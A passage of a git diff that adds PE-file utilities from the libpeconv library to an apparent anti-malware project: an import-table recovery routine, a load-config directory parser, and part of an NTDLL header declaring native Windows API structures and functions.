_DEBUG + //if it is not the first name from the list, inform about it: + if (funcname_itr != addr_to_func[searchedAddr].begin()) { + std::cout << ">[*][" << std::hex << searchedAddr << "] " << found_func.toString() << std::endl; + } + std::cout <<"[+] Found the name at: " << std::hex << name_offset << std::endl; +#endif + PIMAGE_IMPORT_BY_NAME imp_field = reinterpret_cast(name_offset - sizeof(WORD)); // substract the size of Hint + //TODO: validate more... + memcpy(thunk_ptr, &imp_field, sizeof(FIELD_T)); +#ifdef _DEBUG + std::cout << "[+] Wrote found to offset: " << std::hex << call_via_ptr << std::endl; +#endif + is_name_saved = true; + break; + } + //name not found or could not be saved - fill the ordinal instead: + if (!is_name_saved && lastOrdinal != 0) { +#ifdef _DEBUG + std::cout << "[+] Filling ordinal: " << lastOrdinal << std::endl; +#endif + FIELD_T ord_thunk = lastOrdinal | ordinal_flag; + memcpy(thunk_ptr, &ord_thunk, sizeof(FIELD_T)); + is_name_saved = true; + } + return is_name_saved; +} + +template +bool ImportsUneraser::writeFoundFunction(IMAGE_THUNK_DATA_T* desc, const FIELD_T ordinal_flag, const ExportedFunc &foundFunc) +{ + if (foundFunc.isByOrdinal) { + FIELD_T ordinal = foundFunc.funcOrdinal | ordinal_flag; + FIELD_T* by_ord = (FIELD_T*) desc; + *by_ord = ordinal; +#ifdef _DEBUG + std::cout << "[+] Saved ordinal" << std::endl; +#endif + return true; + } + + PIMAGE_IMPORT_BY_NAME by_name = (PIMAGE_IMPORT_BY_NAME) ((ULONGLONG) modulePtr + desc->u1.AddressOfData); + + LPSTR func_name_ptr = reinterpret_cast(by_name->Name); + std::string found_name = foundFunc.funcName; + bool is_nameptr_valid = validate_ptr(modulePtr, moduleSize, func_name_ptr, found_name.length()); + // try to save the found name under the pointer: + if (is_nameptr_valid) { + by_name->Hint = MASK_TO_WORD(foundFunc.funcOrdinal); + memcpy(func_name_ptr, found_name.c_str(), found_name.length() + 1); // with the ending '\0' +#ifdef _DEBUG + std::cout << "[+] Saved name" << std::endl; +#endif + return true; + } + return false; +} + +template +bool ImportsUneraser::fillImportNames( + IN OUT IMAGE_IMPORT_DESCRIPTOR* lib_desc, + IN const FIELD_T ordinal_flag, + IN std::map> &addr_to_func, + OUT OPTIONAL ImpsNotCovered* notCovered +) +{ + if (lib_desc == NULL) return false; + + FIELD_T call_via = lib_desc->FirstThunk; + if (call_via == NULL) return false; + + size_t processed_imps = 0; + size_t recovered_imps = 0; + + FIELD_T thunk_addr = lib_desc->OriginalFirstThunk; + if (thunk_addr == NULL) { + thunk_addr = call_via; + } + + BYTE* call_via_ptr = (BYTE*)((ULONGLONG)modulePtr + call_via); + BYTE* thunk_ptr = (BYTE*)((ULONGLONG)modulePtr + thunk_addr); + for (; + call_via_ptr != NULL && thunk_ptr != NULL; + call_via_ptr += sizeof(FIELD_T), thunk_ptr += sizeof(FIELD_T) + ) + { + FIELD_T *thunk_val = (FIELD_T*)thunk_ptr; + FIELD_T *call_via_val = (FIELD_T*)call_via_ptr; + if (*call_via_val == 0) { + //nothing to fill, probably the last record + break; + } + IMAGE_THUNK_DATA_T* desc = (IMAGE_THUNK_DATA_T*)thunk_ptr; + if (desc->u1.Function == NULL) { + break; + } + ULONGLONG searchedAddr = ULONGLONG(*call_via_val); + std::map>::const_iterator found_itr = addr_to_func.find(searchedAddr); + if (found_itr == addr_to_func.end() || found_itr->second.size() == 0) { + //not found, move on + if (notCovered) { + notCovered->insert((call_via_ptr - modulePtr), searchedAddr); + } + continue; + } + std::set::const_iterator funcname_itr = found_itr->second.begin(); + const peconv::ExportedFunc &foundFunc = *funcname_itr; + +#ifdef _DEBUG + std::cout << "[*][" << std::hex << searchedAddr << "] " << funcname_itr->toString() << std::endl; +#endif + bool is_name_saved = writeFoundFunction(desc, ordinal_flag, *funcname_itr); + if (!is_name_saved) { + is_name_saved = findNameInBinaryAndFill(lib_desc, call_via_ptr, thunk_ptr, ordinal_flag, addr_to_func); + } + processed_imps++; + if (is_name_saved) recovered_imps++; + } + + return (recovered_imps == processed_imps); +} + +bool ImportsUneraser::uneraseDllImports(IN OUT IMAGE_IMPORT_DESCRIPTOR* lib_desc, IN ImportedDllCoverage &dllCoverage, OUT OPTIONAL ImpsNotCovered* notCovered) +{ + //everything mapped, now recover it: + bool is_filled = false; + if (!is64) { + is_filled = fillImportNames(lib_desc, IMAGE_ORDINAL_FLAG32, dllCoverage.addrToFunc, notCovered); + } else { + is_filled = fillImportNames(lib_desc, IMAGE_ORDINAL_FLAG64, dllCoverage.addrToFunc, notCovered); + } + if (!is_filled) { + std::cerr << "[-] Could not fill some import names!" << std::endl; + return false; + } + return is_filled; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/load_config_util.cpp b/ai_anti_malware/libpeconv/libpeconv/src/load_config_util.cpp new file mode 100644 index 0000000..b6be95f --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/load_config_util.cpp @@ -0,0 +1,57 @@ +#include "peconv/load_config_util.h" +#include "peconv/pe_hdrs_helper.h" + +BYTE* peconv::get_load_config_ptr(BYTE* buffer, size_t buf_size) +{ + if (!buffer || !buf_size) return nullptr; + IMAGE_DATA_DIRECTORY* dir = peconv::get_directory_entry(buffer, IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG); + if (!dir) { + return 0; + } + DWORD entry_rva = dir->VirtualAddress; + DWORD entry_size = dir->Size; + if (!peconv::validate_ptr(buffer, buf_size, buffer + entry_rva, entry_size)) { + return 0; + } + IMAGE_LOAD_CONFIG_DIRECTORY32* ldc = reinterpret_cast((ULONG_PTR)buffer + entry_rva); + return reinterpret_cast(ldc); +} + +peconv::t_load_config_ver peconv::get_load_config_version(BYTE* buffer, size_t buf_size, BYTE* ld_config_ptr) +{ + if (!buffer || !buf_size || !ld_config_ptr) peconv::LOAD_CONFIG_NONE; + bool is64b = peconv::is64bit(buffer); + + if (!peconv::validate_ptr(buffer, buf_size, ld_config_ptr, sizeof(peconv::IMAGE_LOAD_CONFIG_DIR32_W7))) { + return peconv::LOAD_CONFIG_NONE; + } + + peconv::IMAGE_LOAD_CONFIG_DIR32_W7* smallest = (peconv::IMAGE_LOAD_CONFIG_DIR32_W7*)ld_config_ptr; + const size_t curr_size = smallest->Size; + + if (is64b) { + switch (curr_size) { + case sizeof(peconv::IMAGE_LOAD_CONFIG_DIR64_W7) : + return peconv::LOAD_CONFIG_W7_VER; + case sizeof(peconv::IMAGE_LOAD_CONFIG_DIR64_W8) : + return peconv::LOAD_CONFIG_W8_VER; + case sizeof(peconv::IMAGE_LOAD_CONFIG_DIR64_W10) : + return peconv::LOAD_CONFIG_W10_VER; + default: + return LOAD_CONFIG_UNK_VER; + } + } + else { + switch (curr_size) { + case sizeof(peconv::IMAGE_LOAD_CONFIG_DIR32_W7) : + return peconv::LOAD_CONFIG_W7_VER; + case sizeof(peconv::IMAGE_LOAD_CONFIG_DIR32_W8) : + return peconv::LOAD_CONFIG_W8_VER; + case sizeof(peconv::IMAGE_LOAD_CONFIG_DIR32_W10) : + return peconv::LOAD_CONFIG_W10_VER; + default: + return LOAD_CONFIG_UNK_VER; + } + } + return LOAD_CONFIG_UNK_VER; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/ntddk.h b/ai_anti_malware/libpeconv/libpeconv/src/ntddk.h new file mode 100644 index 0000000..e840dc5 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/ntddk.h @@ -0,0 +1,4302 @@ +#ifndef __NTDLL_H__ +#define __NTDLL_H__ + +#ifdef __cplusplus +extern "C" { +#endif +#include + +#ifdef _NTDDK_ +#error This header cannot be compiled together with NTDDK +#endif + + +#ifndef _NTDLL_SELF_ // Auto-insert the library +#pragma comment(lib, "Ntdll.lib") +#endif + +#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union + +#pragma warning(push) +#pragma warning(disable:4005) +#include +#pragma warning(pop) + +//------------------------------------------------------------------------------ +// Defines for NTSTATUS + +typedef long NTSTATUS; + +#ifndef NT_SUCCESS +#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) +#endif + +#ifndef STATUS_SUCCESS +#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) +#endif + +#ifndef STATUS_UNSUCCESSFUL +#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L) +#endif + +#ifndef ASSERT +#ifdef _DEBUG +#define ASSERT(x) assert(x) +#else +#define ASSERT(x) /* x */ +#endif +#endif + +//------------------------------------------------------------------------------ +// Structures + +typedef enum _EVENT_TYPE +{ + NotificationEvent, + SynchronizationEvent + +} EVENT_TYPE; + +// +// ANSI strings are counted 8-bit character strings. If they are +// NULL terminated, Length does not include trailing NULL. +// + +#ifndef _NTSECAPI_ +typedef struct _STRING +{ + USHORT Length; + USHORT MaximumLength; + PCHAR Buffer; + +} STRING, *PSTRING; + +// +// Unicode strings are counted 16-bit character strings. If they are +// NULL terminated, Length does not include trailing NULL. +// + +typedef struct _UNICODE_STRING +{ + USHORT Length; + USHORT MaximumLength; + PWSTR Buffer; + +} UNICODE_STRING, *PUNICODE_STRING; +#endif // _NTSECAPI_ + +typedef STRING ANSI_STRING; +typedef PSTRING PANSI_STRING; + +typedef STRING OEM_STRING; +typedef PSTRING POEM_STRING; +typedef CONST STRING* PCOEM_STRING; + +typedef const UNICODE_STRING *PCUNICODE_STRING; + +#define UNICODE_NULL ((WCHAR)0) // winnt + +// +// Valid values for the Attributes field +// + +#ifndef OBJ_CASE_INSENSITIVE +#define OBJ_INHERIT 0x00000002L +#define OBJ_PERMANENT 0x00000010L +#define OBJ_EXCLUSIVE 0x00000020L +#define OBJ_CASE_INSENSITIVE 0x00000040L +#define OBJ_OPENIF 0x00000080L +#define OBJ_OPENLINK 0x00000100L +#define OBJ_KERNEL_HANDLE 0x00000200L +#define OBJ_FORCE_ACCESS_CHECK 0x00000400L +#define OBJ_VALID_ATTRIBUTES 0x000007F2L + +// +// Object Attributes structure +// + +typedef struct _OBJECT_ATTRIBUTES +{ + ULONG Length; + HANDLE RootDirectory; + PUNICODE_STRING ObjectName; + ULONG Attributes; + PVOID SecurityDescriptor; // Points to type SECURITY_DESCRIPTOR + PVOID SecurityQualityOfService; // Points to type SECURITY_QUALITY_OF_SERVICE + +} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; +#endif // OBJ_CASE_INSENSITIVE + +// +// IO_STATUS_BLOCK +// + +typedef struct _IO_STATUS_BLOCK +{ + union + { + NTSTATUS Status; + PVOID Pointer; + }; + + ULONG_PTR Information; + +} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; + +// +// ClientId +// + +typedef struct _CLIENT_ID +{ + HANDLE UniqueProcess; + HANDLE UniqueThread; + +} CLIENT_ID, *PCLIENT_ID; + + +// +// CURDIR structure +// + +typedef struct _CURDIR +{ + UNICODE_STRING DosPath; + HANDLE Handle; + +} CURDIR, *PCURDIR; + + +//------------------------------------------------------------------------------ +// Macros + +// INIT_UNICODE_STRING is a replacement of RtlInitUnicodeString +#ifndef INIT_UNICODE_STRING +#define INIT_UNICODE_STRING(us, wch) \ + us.MaximumLength = (USHORT)sizeof(wch); \ + us.Length = (USHORT)(wcslen(wch) * sizeof(WCHAR)); \ + us.Buffer = wch +#endif + + +#ifndef InitializeObjectAttributes +#define InitializeObjectAttributes( p, n, a, r, s ) { \ + (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ + (p)->RootDirectory = r; \ + (p)->Attributes = a; \ + (p)->ObjectName = n; \ + (p)->SecurityDescriptor = s; \ + (p)->SecurityQualityOfService = NULL; \ + } +#endif + + +#ifndef InitializePortHeader +#define InitializeMessageHeader( ph, l, t ) { \ + (ph)->TotalLength = (USHORT)(l); \ + (ph)->DataLength = (USHORT)(l - sizeof(PORT_MESSAGE)); \ + (ph)->Type = (USHORT)(t); \ + (ph)->VirtualRangesOffset = 0; \ + } +#endif + +//----------------------------------------------------------------------------- +// Image functions + +NTSYSAPI +PVOID +NTAPI +RtlImageNtHeader ( + IN PVOID BaseAddress + ); + +NTSYSAPI +PVOID +NTAPI +RtlImageDirectoryEntryToData ( + IN PVOID Base, + IN BOOLEAN MappedAsImage, + IN USHORT DirectoryEntry, + OUT PULONG Size + ); + +//----------------------------------------------------------------------------- +// Unicode string functions + +NTSYSAPI +NTSTATUS +NTAPI +RtlStringFromGUID( + IN REFGUID Guid, + OUT PUNICODE_STRING GuidString + ); + + +NTSYSAPI +VOID +NTAPI +RtlInitUnicodeString( + PUNICODE_STRING DestinationString, + PCWSTR SourceString + ); + + +NTSYSAPI +BOOLEAN +NTAPI +RtlCreateUnicodeString( + OUT PUNICODE_STRING DestinationString, + IN PCWSTR SourceString + ); + + +NTSYSAPI +BOOLEAN +NTAPI +RtlCreateUnicodeStringFromAsciiz( + OUT PUNICODE_STRING Destination, + IN PCSTR Source + ); + + +NTSYSAPI +BOOLEAN +NTAPI +RtlPrefixUnicodeString ( + IN PUNICODE_STRING String1, + IN PUNICODE_STRING String2, + IN BOOLEAN CaseInSensitive + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlDuplicateUnicodeString( + IN BOOLEAN AllocateNew, + IN PUNICODE_STRING SourceString, + OUT PUNICODE_STRING TargetString + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlAppendUnicodeToString ( + PUNICODE_STRING Destination, + PCWSTR Source + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlAppendUnicodeStringToString( + IN OUT PUNICODE_STRING Destination, + IN PUNICODE_STRING Source + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlUnicodeStringToInteger ( + IN PUNICODE_STRING String, + IN ULONG Base OPTIONAL, + OUT PULONG Value + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlIntegerToUnicodeString ( + IN ULONG Value, + IN ULONG Base OPTIONAL, + IN OUT PUNICODE_STRING String + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlGUIDFromString( + IN PUNICODE_STRING GuidString, + OUT GUID *Guid + ); + + +NTSYSAPI +LONG +NTAPI +RtlCompareUnicodeString ( + IN PUNICODE_STRING String1, + IN PUNICODE_STRING String2, + IN BOOLEAN CaseInSensitive + ); + + +NTSYSAPI +VOID +NTAPI +RtlCopyUnicodeString( + OUT PUNICODE_STRING DestinationString, + IN PUNICODE_STRING SourceString + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlUpcaseUnicodeString ( + OUT PUNICODE_STRING DestinationString, + IN PUNICODE_STRING SourceString, + IN BOOLEAN AllocateDestinationString + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlDowncaseUnicodeString ( + OUT PUNICODE_STRING DestinationString, + IN PUNICODE_STRING SourceString, + IN BOOLEAN AllocateDestinationString + ); + + +NTSYSAPI +BOOLEAN +NTAPI +RtlEqualUnicodeString ( + IN PUNICODE_STRING String1, + IN PUNICODE_STRING String2, + IN BOOLEAN CaseInSensitive + ); + + +NTSYSAPI +VOID +NTAPI +RtlFreeUnicodeString( + IN PUNICODE_STRING UnicodeString + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlAnsiStringToUnicodeString ( + OUT PUNICODE_STRING DestinationString, + IN PANSI_STRING SourceString, + IN BOOLEAN AllocateDestinationString + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlUnicodeStringToAnsiString ( + OUT PANSI_STRING DestinationString, + IN PUNICODE_STRING SourceString, + IN BOOLEAN AllocateDestinationString + ); + + +NTSYSAPI +VOID +NTAPI +RtlInitAnsiString ( + OUT PANSI_STRING DestinationString, + IN PCHAR SourceString + ); + + +NTSYSAPI +VOID +NTAPI +RtlFreeAnsiString ( + IN PANSI_STRING AnsiString + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlFormatCurrentUserKeyPath( + OUT PUNICODE_STRING CurrentUserKeyPath + ); + + +NTSYSAPI +VOID +NTAPI +RtlRaiseStatus ( + IN NTSTATUS Status + ); + + +NTSYSAPI +VOID +NTAPI +DbgBreakPoint( + VOID + ); + + +NTSYSAPI +ULONG +_cdecl +DbgPrint ( + PCH Format, + ... + ); + + +NTSYSAPI +ULONG +NTAPI +RtlRandom( + IN OUT PULONG Seed + ); + +//----------------------------------------------------------------------------- +// Critical section functions + +NTSYSAPI +NTSTATUS +NTAPI +RtlInitializeCriticalSection( + IN PRTL_CRITICAL_SECTION CriticalSection + ); + + +NTSYSAPI +BOOL +NTAPI +RtlTryEnterCriticalSection( + IN PRTL_CRITICAL_SECTION CriticalSection + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlEnterCriticalSection( + IN PRTL_CRITICAL_SECTION CriticalSection + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlLeaveCriticalSection( + IN PRTL_CRITICAL_SECTION CriticalSection + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlDeleteCriticalSection( + IN PRTL_CRITICAL_SECTION CriticalSection + ); + +//----------------------------------------------------------------------------- +// Object functions + +// +// Object Manager Directory Specific Access Rights. +// + +#ifndef DIRECTORY_QUERY +#define DIRECTORY_QUERY (0x0001) +#define DIRECTORY_TRAVERSE (0x0002) +#define DIRECTORY_CREATE_OBJECT (0x0004) +#define DIRECTORY_CREATE_SUBDIRECTORY (0x0008) +#define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF) +#endif + +typedef enum _POOL_TYPE { + NonPagedPool, + PagedPool, + NonPagedPoolMustSucceed, + DontUseThisType, + NonPagedPoolCacheAligned, + PagedPoolCacheAligned, + NonPagedPoolCacheAlignedMustS, + MaxPoolType +} POOL_TYPE; + + +// +// For NtQueryObject +// + +typedef enum _OBJECT_INFORMATION_CLASS { + ObjectBasicInformation, // = 0 + ObjectNameInformation, // = 1 + ObjectTypeInformation, // = 2 + ObjectTypesInformation, // = 3 //object handle is ignored + ObjectHandleFlagInformation // = 4 +} OBJECT_INFORMATION_CLASS; + +// +// NtQueryObject uses ObjectBasicInformation +// + +typedef struct _OBJECT_BASIC_INFORMATION { + ULONG Attributes; + ACCESS_MASK GrantedAccess; + ULONG HandleCount; + ULONG PointerCount; + ULONG PagedPoolCharge; + ULONG NonPagedPoolCharge; + ULONG Reserved[3]; + ULONG NameInfoSize; + ULONG TypeInfoSize; + ULONG SecurityDescriptorSize; + LARGE_INTEGER CreationTime; +} OBJECT_BASIC_INFORMATION, *POBJECT_BASIC_INFORMATION; + +// +// NtQueryObject uses ObjectNameInformation +// + +typedef struct _OBJECT_NAME_INFORMATION { + UNICODE_STRING Name; +} OBJECT_NAME_INFORMATION, *POBJECT_NAME_INFORMATION; + +// +// NtQueryObject uses ObjectTypeInformation +// + +typedef struct _OBJECT_TYPE_INFORMATION { + UNICODE_STRING TypeName; + ULONG TotalNumberOfObjects; + ULONG TotalNumberOfHandles; + ULONG TotalPagedPoolUsage; + ULONG TotalNonPagedPoolUsage; + ULONG TotalNamePoolUsage; + ULONG TotalHandleTableUsage; + ULONG HighWaterNumberOfObjects; + ULONG HighWaterNumberOfHandles; + ULONG HighWaterPagedPoolUsage; + ULONG HighWaterNonPagedPoolUsage; + ULONG HighWaterNamePoolUsage; + ULONG HighWaterHandleTableUsage; + ULONG InvalidAttributes; + GENERIC_MAPPING GenericMapping; + ULONG ValidAccessMask; + BOOLEAN SecurityRequired; + BOOLEAN MaintainHandleCount; + POOL_TYPE PoolType; + ULONG DefaultPagedPoolCharge; + ULONG DefaultNonPagedPoolCharge; +} OBJECT_TYPE_INFORMATION, *POBJECT_TYPE_INFORMATION; + +// +// NtQueryObject uses ObjectHandleFlagInformation +// NtSetInformationObject uses ObjectHandleFlagInformation +// + +typedef struct _OBJECT_HANDLE_FLAG_INFORMATION { + BOOLEAN Inherit; + BOOLEAN ProtectFromClose; +} OBJECT_HANDLE_FLAG_INFORMATION, *POBJECT_HANDLE_FLAG_INFORMATION; + +// +// NtQueryDirectoryObject uses this type +// + +typedef struct _OBJECT_DIRECTORY_INFORMATION { + UNICODE_STRING Name; + UNICODE_STRING TypeName; +} OBJECT_DIRECTORY_INFORMATION, *POBJECT_DIRECTORY_INFORMATION; + + +NTSYSAPI +NTSTATUS +NTAPI +NtOpenDirectoryObject( + OUT PHANDLE DirectoryHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtQueryDirectoryObject( + IN HANDLE DirectoryHandle, + OUT PVOID Buffer, + IN ULONG Length, + IN BOOLEAN ReturnSingleEntry, + IN BOOLEAN RestartScan, + IN OUT PULONG Context, + OUT PULONG ReturnLength OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtQueryObject ( + IN HANDLE ObjectHandle, + IN OBJECT_INFORMATION_CLASS ObjectInformationClass, + OUT PVOID ObjectInformation, + IN ULONG Length, + OUT PULONG ResultLength OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtSetInformationObject ( + IN HANDLE ObjectHandle, + IN OBJECT_INFORMATION_CLASS ObjectInformationClass, + IN PVOID ObjectInformation, + IN ULONG Length + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtDuplicateObject ( + IN HANDLE SourceProcessHandle, + IN HANDLE SourceHandle, + IN HANDLE TargetProcessHandle OPTIONAL, + OUT PHANDLE TargetHandle OPTIONAL, + IN ACCESS_MASK DesiredAccess, + IN ULONG HandleAttributes, + IN ULONG Options + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtQuerySecurityObject ( + IN HANDLE ObjectHandle, + IN SECURITY_INFORMATION SecurityInformation, + OUT PSECURITY_DESCRIPTOR SecurityDescriptor, + IN ULONG DescriptorLength, + OUT PULONG ReturnLength + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtSetSecurityObject ( + IN HANDLE ObjectHandle, + IN SECURITY_INFORMATION SecurityInformation, + IN PSECURITY_DESCRIPTOR SecurityDescriptor + ); + + +//----------------------------------------------------------------------------- +// Handle table RTL functions + +#define LEVEL_HANDLE_ID 0x74000000 +#define LEVEL_HANDLE_ID_MASK 0xFF000000 +#define LEVEL_HANDLE_INDEX_MASK 0x00FFFFFF + +typedef enum _RTL_GENERIC_COMPARE_RESULTS { + GenericLessThan, + GenericGreaterThan, + GenericEqual +} RTL_GENERIC_COMPARE_RESULTS; + + +typedef struct _RTL_SPLAY_LINKS +{ + struct _RTL_SPLAY_LINKS *Parent; + struct _RTL_SPLAY_LINKS *LeftChild; + struct _RTL_SPLAY_LINKS *RightChild; +} RTL_SPLAY_LINKS, *PRTL_SPLAY_LINKS; + + +struct _RTL_GENERIC_TABLE; + +typedef +RTL_GENERIC_COMPARE_RESULTS +(NTAPI * PRTL_GENERIC_COMPARE_ROUTINE) ( + struct _RTL_GENERIC_TABLE *Table, + PVOID FirstStruct, + PVOID SecondStruct + ); + +typedef +PVOID +(NTAPI *PRTL_GENERIC_ALLOCATE_ROUTINE) ( + struct _RTL_GENERIC_TABLE *Table, + ULONG ByteSize + ); + +typedef +VOID +(NTAPI *PRTL_GENERIC_FREE_ROUTINE) ( + struct _RTL_GENERIC_TABLE *Table, + PVOID Buffer + ); + + +typedef struct _RTL_GENERIC_TABLE { + PRTL_SPLAY_LINKS TableRoot; + LIST_ENTRY InsertOrderList; + PLIST_ENTRY OrderedPointer; + ULONG WhichOrderedElement; + ULONG NumberGenericTableElements; + PRTL_GENERIC_COMPARE_ROUTINE CompareRoutine; + PRTL_GENERIC_ALLOCATE_ROUTINE AllocateRoutine; + PRTL_GENERIC_FREE_ROUTINE FreeRoutine; + PVOID TableContext; +} RTL_GENERIC_TABLE, *PRTL_GENERIC_TABLE; + + +typedef struct _RTL_HANDLE_TABLE_ENTRY +{ + struct _RTL_HANDLE_TABLE_ENTRY *Next; /* pointer to next free handle */ + PVOID Object; + +} RTL_HANDLE_TABLE_ENTRY, *PRTL_HANDLE_TABLE_ENTRY; + + +typedef struct _RTL_HANDLE_TABLE +{ + ULONG MaximumNumberOfHandles; + ULONG SizeOfHandleTableEntry; + ULONG Unknown01; + ULONG Unknown02; + PRTL_HANDLE_TABLE_ENTRY FreeHandles; + PRTL_HANDLE_TABLE_ENTRY CommittedHandles; + PRTL_HANDLE_TABLE_ENTRY UnCommittedHandles; + PRTL_HANDLE_TABLE_ENTRY MaxReservedHandles; +} RTL_HANDLE_TABLE, *PRTL_HANDLE_TABLE; + + +NTSYSAPI +VOID +NTAPI +RtlInitializeGenericTable ( + IN PRTL_GENERIC_TABLE Table, + IN PRTL_GENERIC_COMPARE_ROUTINE CompareRoutine, + IN PRTL_GENERIC_ALLOCATE_ROUTINE AllocateRoutine, + IN PRTL_GENERIC_FREE_ROUTINE FreeRoutine, + IN PVOID TableContext + ); + + +NTSYSAPI +VOID +NTAPI +RtlInitializeHandleTable( + IN ULONG MaximumNumberOfHandles, + IN ULONG SizeOfHandleTableEntry, + OUT PRTL_HANDLE_TABLE HandleTable + ); + + +NTSYSAPI +PRTL_HANDLE_TABLE_ENTRY +NTAPI +RtlAllocateHandle( + IN PRTL_HANDLE_TABLE HandleTable, + OUT PULONG HandleIndex OPTIONAL + ); + + +NTSYSAPI +BOOLEAN +NTAPI +RtlFreeHandle( + IN PRTL_HANDLE_TABLE HandleTable, + IN PRTL_HANDLE_TABLE_ENTRY Handle + ); + + +NTSYSAPI +BOOLEAN +NTAPI +RtlIsValidIndexHandle( + IN PRTL_HANDLE_TABLE HandleTable, + IN ULONG HandleIndex, + OUT PRTL_HANDLE_TABLE_ENTRY *Handle + ); + + +NTSYSAPI +PVOID +NTAPI +RtlInsertElementGenericTable ( + IN PRTL_GENERIC_TABLE Table, + IN PVOID Buffer, + IN LONG BufferSize, + OUT PBOOLEAN NewElement OPTIONAL + ); + + +NTSYSAPI +BOOLEAN +NTAPI +RtlIsGenericTableEmpty ( + IN PRTL_GENERIC_TABLE Table + ); + + +NTSYSAPI +BOOLEAN +NTAPI +RtlIsGenericTableEmpty ( + IN PRTL_GENERIC_TABLE Table + ); + + +NTSYSAPI +PVOID +NTAPI +RtlLookupElementGenericTable ( + IN PRTL_GENERIC_TABLE Table, + IN PVOID Buffer + ); + + +NTSYSAPI +PVOID +NTAPI +RtlEnumerateGenericTableWithoutSplaying( + IN PRTL_GENERIC_TABLE Table, + IN PVOID *RestartKey + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtClose( + IN HANDLE Handle + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwClose( + IN HANDLE Handle + ); + +//----------------------------------------------------------------------------- +// Environment functions + +NTSYSAPI +NTSTATUS +NTAPI +RtlOpenCurrentUser( + IN ULONG DesiredAccess, + OUT PHANDLE CurrentUserKey + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlCreateEnvironment( + BOOLEAN CloneCurrentEnvironment, + PVOID *Environment + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlQueryEnvironmentVariable_U ( + PVOID Environment, + PUNICODE_STRING Name, + PUNICODE_STRING Value + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlSetEnvironmentVariable( + PVOID *Environment, + PUNICODE_STRING Name, + PUNICODE_STRING Value + ); + + +NTSYSAPI +NTSTATUS +NTAPI +RtlDestroyEnvironment( + PVOID Environment + ); + +//----------------------------------------------------------------------------- +// Registry functions + + +typedef enum _KEY_INFORMATION_CLASS +{ + KeyBasicInformation, + KeyNodeInformation, + KeyFullInformation, + KeyNameInformation, + KeyCachedInformation, + KeyFlagsInformation, + MaxKeyInfoClass // MaxKeyInfoClass should always be the last enum + +} KEY_INFORMATION_CLASS; + +// +// Key query structures +// + +typedef struct _KEY_BASIC_INFORMATION +{ + LARGE_INTEGER LastWriteTime; + ULONG TitleIndex; + ULONG NameLength; + WCHAR Name[1]; // Variable length string + +} KEY_BASIC_INFORMATION, *PKEY_BASIC_INFORMATION; + + +typedef struct _KEY_NODE_INFORMATION +{ + LARGE_INTEGER LastWriteTime; + ULONG TitleIndex; + ULONG ClassOffset; + ULONG ClassLength; + ULONG NameLength; + WCHAR Name[1]; // Variable length string +// Class[1]; // Variable length string not declared +} KEY_NODE_INFORMATION, *PKEY_NODE_INFORMATION; + + +typedef struct _KEY_FULL_INFORMATION +{ + LARGE_INTEGER LastWriteTime; + ULONG TitleIndex; + ULONG ClassOffset; + ULONG ClassLength; + ULONG SubKeys; + ULONG MaxNameLen; + ULONG MaxClassLen; + ULONG Values; + ULONG MaxValueNameLen; + ULONG MaxValueDataLen; + WCHAR Class[1]; // Variable length + +} KEY_FULL_INFORMATION, *PKEY_FULL_INFORMATION; + + +// end_wdm +typedef struct _KEY_NAME_INFORMATION +{ + ULONG NameLength; + WCHAR Name[1]; // Variable length string + +} KEY_NAME_INFORMATION, *PKEY_NAME_INFORMATION; + +typedef struct _KEY_CACHED_INFORMATION +{ + LARGE_INTEGER LastWriteTime; + ULONG TitleIndex; + ULONG SubKeys; + ULONG MaxNameLen; + ULONG Values; + ULONG MaxValueNameLen; + ULONG MaxValueDataLen; + ULONG NameLength; + WCHAR Name[1]; // Variable length string + +} KEY_CACHED_INFORMATION, *PKEY_CACHED_INFORMATION; + + +typedef struct _KEY_FLAGS_INFORMATION +{ + ULONG UserFlags; + +} KEY_FLAGS_INFORMATION, *PKEY_FLAGS_INFORMATION; + + + +typedef enum _KEY_VALUE_INFORMATION_CLASS { + KeyValueBasicInformation, + KeyValueFullInformation, + KeyValuePartialInformation, + KeyValueFullInformationAlign64, + KeyValuePartialInformationAlign64, + MaxKeyValueInfoClass // MaxKeyValueInfoClass should always be the last enum +} KEY_VALUE_INFORMATION_CLASS; + + +typedef struct _KEY_VALUE_FULL_INFORMATION { + ULONG TitleIndex; + ULONG Type; + ULONG DataOffset; + ULONG DataLength; + ULONG NameLength; + WCHAR Name[1]; // Variable size 